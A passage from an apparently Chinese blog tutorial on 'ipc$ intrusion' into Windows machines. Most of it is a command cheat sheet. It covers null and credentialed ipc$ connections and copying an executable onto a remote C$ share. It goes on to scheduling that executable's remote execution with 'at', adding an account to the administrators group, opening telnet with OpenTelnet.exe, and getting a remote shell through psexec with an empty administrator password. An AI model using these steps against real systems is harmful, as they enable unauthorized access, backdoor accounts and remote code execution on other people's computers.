这样就把它的c盘开为共享名为xinxin共享文件夹了。(可是我发现很多人错误的认为开共享文件夹的命令是net share c$,还大模大样的给菜鸟指指点点,真是误人子弟了)。再次声明,这些操作都是在shell下才能实现的。




十一 一些需要shell才能完成的命令
看到很多教程这方面写的十分不准确,一些需要shell才能完成命令就简简单单的在ipc$连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令:



1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完成;



2 打开远程主机的ipc$共享,默认共享,普通共享的操作需要在shell下完成;



3 运行/关闭远程主机的服务,需要在shell下完成;



4 启动/杀掉远程主机的进程,也需要在shell下完成(用软件的情况下除外,如pskill)。




十二 入侵中可能会用到的命令
为了这份教程的完整性,我列出了ipc$入侵中的一些常用命令,如果你已经掌握了这些命令,你可以跳过这一部分看下面的内容。请注意这些命令是适用于本地还是远程,如果只适用于本地,你只能在获得远程主机的shell(如cmd,telnet等)后,才能向远程主机执行。




1 建立/删除ipc$连接的命令



1)建立空连接:
net use \\127.0.0.1\ipc$ "" /user:""



2)建立非空连接:
net use \\127.0.0.1\ipc$ "密码" /user:"用户名"



3)删除连接:
net use \\127.0.0.1\ipc$ /del




2 在ipc$连接中对远程主机的操作命令



1) 查看远程主机的共享资源(看不到默认共享):
net view \\127.0.0.1



2) 查看远程主机的当前时间:
net time \\127.0.0.1



3) 得到远程主机的netbios用户名列表:
nbtstat -A 127.0.0.1



4)映射/删除远程共享:
net use z: \\127.0.0.1\c
此命令将共享名为c的共享资源映射为本地z盘



net use z: /del
删除映射的z盘,其他盘类推



5)向远程主机复制文件:
copy 路径\文件名 \\IP\共享目录名,如:
copy c:\xinxin.exe \\127.0.0.1\c$ 即将c盘下的xinxin.exe复制到对方c盘内
当然,你也可以把远程主机上的文件复制到自己的机器里:
copy \\127.0.0.1\c$\xinxin.exe c:\



6)远程添加计划任务:
at \\IP 时间 程序名 如:
at \\127.0.0.0 11:00 xinxin.exe
注意:时间尽量使用24小时制;如果你打算运行的程序在系统默认搜索路径(比如system32/)下则不用加路径,否则必须加全路径




3 本地命令



1)查看本地主机的共享资源(可以看到本地的默认共享)
net share



2)得到本地主机的用户列表
net user



3)显示本地某用户的帐户信息
net user 帐户名



4)显示本地主机当前启动的服务
net start



5)启动/关闭本地服务
net start 服务名
net stop 服务名



6)在本地添加帐户
net user 帐户名 密码 /add



7)激活禁用的用户
net uesr 帐户名 /active:yes



8)加入管理员组
net localgroup administrators 帐户名 /add



很显然的是,虽然这些都是本地命令,但如果你在远程主机的shell中输入,比如你telnet成功后输入上面这些命令,那么这些本地输入将作用在远程主机上。




4 其他一些命令
1)telnet
telnet IP 端口
telnet 127.0.0.0 23



2)用opentelnet.exe开启远程主机的telnet
OpenTelnet.exe \\ip 管理员帐号 密码 NTLM的认证方式 port
OpenTelnet.exe \\127.0.0.1 administrator "" 1 90
不过这个小工具需要满足四个要求:
1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
3)目标开启RemoteRegistry服务,用户就可以更改ntlm认证
4)对仅WIN2K/XP有效



3)用p***ec.exe一步获得shell,需要ipc管道支持
p***ec.exe \\IP -u 管理员帐号 -p 密码 cmd
p***ec.exe \\127.0.0.1 -u administrator -p "" cmd

评论

此博客中的热门博文

转一下关于Fuck的用法

远程记录OpenWRT日志

用OpenWRT打造自动翻墙路由器(详解篇)